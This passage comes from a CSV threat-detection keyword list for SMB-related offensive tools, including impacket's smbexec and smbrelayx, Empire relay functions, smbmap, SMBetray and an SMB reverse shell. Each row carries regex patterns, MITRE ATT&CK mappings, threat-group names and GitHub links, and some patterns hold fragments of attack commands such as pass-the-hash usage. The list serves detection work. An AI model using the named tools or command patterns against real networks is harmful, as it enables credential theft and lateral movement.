(SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbeagle_*_win_x64.zip*",".{0,1000}smbeagle_.{0,1000}_win_x64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbenum.run*",".{0,1000}smbenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*SMBetray*",".{0,1000}SMBetray.{0,1000}","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","4","380","91","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z" "*-SMBExec*",".{0,1000}\-SMBExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbexec.py -hashes :*",".{0,1000}smbexec\.py\s\-hashes\s\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbexec.py -share*",".{0,1000}smbexec\.py\s\-share.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbexec.py*",".{0,1000}smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*SMBGhost.pcap*",".{0,1000}SMBGhost\.pcap.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","654","199","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" "*smblogin.results.log*",".{0,1000}smblogin\.results\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*smblogin.results.log*",".{0,1000}smblogin\.results\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*smblogin-spray.ps1*",".{0,1000}smblogin\-spray\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*smbmap -*",".{0,1000}smbmap\s\-.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmap -u guest -H *",".{0,1000}smbmap\s\-u\sguest\s\-H\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbmap.py *",".{0,1000}smbmap\.py\s.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmap.smbmap*",".{0,1000}smbmap\.smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmapDump*",".{0,1000}smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*smbmap-execute-command.txt*",".{0,1000}smbmap\-execute\-command\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*smbmap-list-contents.txt*",".{0,1000}smbmap\-list\-contents\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*smbmap-master*",".{0,1000}smbmap\-master.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmap-share-permissions.txt*",".{0,1000}smbmap\-share\-permissions\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*SMBNTLMChallenge*",".{0,1000}SMBNTLMChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SMBNTLMChallenge*",".{0,1000}SMBNTLMChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SMBNTLMResponse*",".{0,1000}SMBNTLMResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbpasswd.py -newpass *",".{0,1000}smbpasswd\.py\s\-newpass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbpasswd.py*",".{0,1000}smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*SMBRelay.py*",".{0,1000}SMBRelay\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*SMBRelayChallenge*",".{0,1000}SMBRelayChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*SMBRelayResponse*",".{0,1000}SMBRelayResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayserver.*",".{0,1000}smbrelayserver\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smbrelayserver.py*",".{0,1000}smbrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbrelayx.py*",".{0,1000}smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smb-reverse-shell.git*",".{0,1000}smb\-reverse\-shell\.git.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*smb-reverse-shell-main*",".{0,1000}smb\-reverse\-shell\-main.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*smbscan*",".{0,1000}smbscan.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","54","15","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" "*smb-scanner*",".{0,1000}smb\-scanner.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","54","15","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" "*SmbScanner.exe*",".{0,1000}SmbScanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - 